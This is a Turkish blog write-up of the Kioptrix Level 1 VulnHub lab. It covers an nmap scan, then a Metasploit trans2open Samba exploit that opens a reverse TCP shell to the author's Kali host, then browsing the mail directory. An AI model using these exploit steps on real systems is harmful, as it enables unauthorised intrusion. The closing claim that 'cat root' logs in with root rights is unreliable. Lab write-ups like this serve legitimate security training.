KİOPTRİX LEVEL1 MAKİNE ÇÖZÜMÜ
Herkese merhaba. Kioptrix Level1 makinesinin çözümünü Kali2020 ve VMware ile ilk defa hep beraber yapacağız.
KİOPTRİX Makinesinin IP Adresini Alamama Sorunu
ÖNEMLİ! : Eğer Kioptrix makinesi VMware ile kullanıyorsanız- Kioptrix makinesinin .vmx uzantılı dosyasını notepad ile açıp “bridged” kelimesini aratın, iki tırnak içerisindeki “bridged” kelimesini “nat” olarak değiştirin. Ondan sonra Kioptrix sanal makinasının network ayarlarından NAT seçeneğine tıklayıp makineyi öyle açınız. Bunları yapmamanız durumunda nmap taramasında KİOPTRİX makinesinin IP adresini alamayabilirsiniz.
SETUP / INSTALL
Kioptrix Level1 İsimli makineyle ilgili bilgilere ve indirme linkine Vulnhub’ın aşağıdaki linkinden ulaşabilirsiniz.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
KİOPTRİX ZAFİYETLİ MAKİNE NEDİR ?
Kioptrix, içerisinde zafiyetleri istismar edilen, çeşitli erişim yöntemleriyle makineyi ele geçirmeye çalıştığımız bir sanal makine uygulamasıdır. Level1 çözümüne başlıyorum.
İfconfig
komutu ile Kali 2020 makinemin IP adresini aldım.
Daha sonra bulunduğum network üzerindeki diğer IP adreslerini bulmak için nmap çalıştırıyorum.
Nmap –sV –A 192.168.160.0/24
ile bulunduğum networkü ve networkdeki açık portları taradım.
Tarama sonucunda 192.168.160.133 IP adresinin Kioptrix makinesine ait IP adresi olduğunu tespit ettim ve burada bir 139 portunun açık olduğunu ve samba açığı olduğunu tespit ettim.
Port 139 nedir neler yapar ?
Port 139; Netbios-ssn servisi için Netbios-session oluşturma ve iletme işlemlerini gerçekleştirir. Netbios ise OSI referans modelinde Session ve Transport katmanlarında çalışan bir API’dir. Netbios networkte bulunan iki cihaz arasında bir oturum başlatmak, bir oturumu sonlandırmak, verilerin doğru cihaza ulaşmasını kontrol etmek ve bilgisayar adlarının networkte çözümlenmesini sağlamakla görevlidir. Tüm bu işlemler port 139 baz alınarak yapılmaktadır. (Ayrıca bknz. http://www.scribd.com/doc/58525278/54/NetBT-Nedir S:47,48,49) Örneğin bir networkte dosya paylaşımı ve dosyaya erişim kontrolleri Netbios-ssn tarafından gerçekleştirilir. Hal böyle olunca, bir çok virüs ve exploit temel olarak Netbios-ssn (Port 139)’i hedef alır. (Kaynak : http://eyupcelik.com.tr/guvenlik/402-yerel-aglarda-port-139-ve-saldiri-yontemi )
* Msfconsole komutuyla Metasiploite geçtim. Burada çalıştırdığım search samba
komutu ile samba açığı ile ilgili exploitleri aramaya başladım. Aynı zamanda burada bizim linux sistemimiz ile ilgili expoliti seçtik ve use exploit/linux/samba/trans2open
komutu ile içeriye girdik.
- Burada reverse_tcp yapıp karşı tarafa reverse shell uygulaması yaptım.
(ÖNEMLİ)
Daha sonra set RHOST 192.168.160.133
ile karşı makinenin IP adresini, set LHOST 192.168.160.129
ile saldırı yapacağım Kali makinemin IP adresini atadım.
run
komutu ile saldırıyı başlattık.
pwd
ile bulunduğumuz dizini kontrol ettik.
ls
dizinimizi listeledik.
cd var
ile var’a geçiş yaptık.
Vulnhub sitesinde ipucu olarak verdiği mail kısmını buldum.
cd mail
ile mail dosyasına ulaştım.
cat root
ile root yetkisiyle giriş yaptık. KİOPTRİX LEVEL1 MAKİNE ÇÖZÜMÜNÜ TAMAMLADIM.
Kioptrix Level2 makinesinin çözümünü ilerleyen günlerde sizlerle paylaşacağım. Güvenli Günler. İyi çalışmalar.
Comments (1)
İbrahim Serhat Bulutsays:
Mart 27, 2023 at 6:55 pmBu alanda kariyer hedefleyen biri olarak elimden geldiğince write up okumaya çalışıyorum, bana verilen tavsiyelerden bir tanesi de buydu. İyi ki yapmışım bunu, yazınızın ilk kısmında IP’nin gözükmemesi durumunu ilk defa gördüm ve bence çok güzel bir şey öğrendim sayenizde, o bilgi için ekstra olacak şekilde yazınızın kalanı içinde çok teşekkür ederim.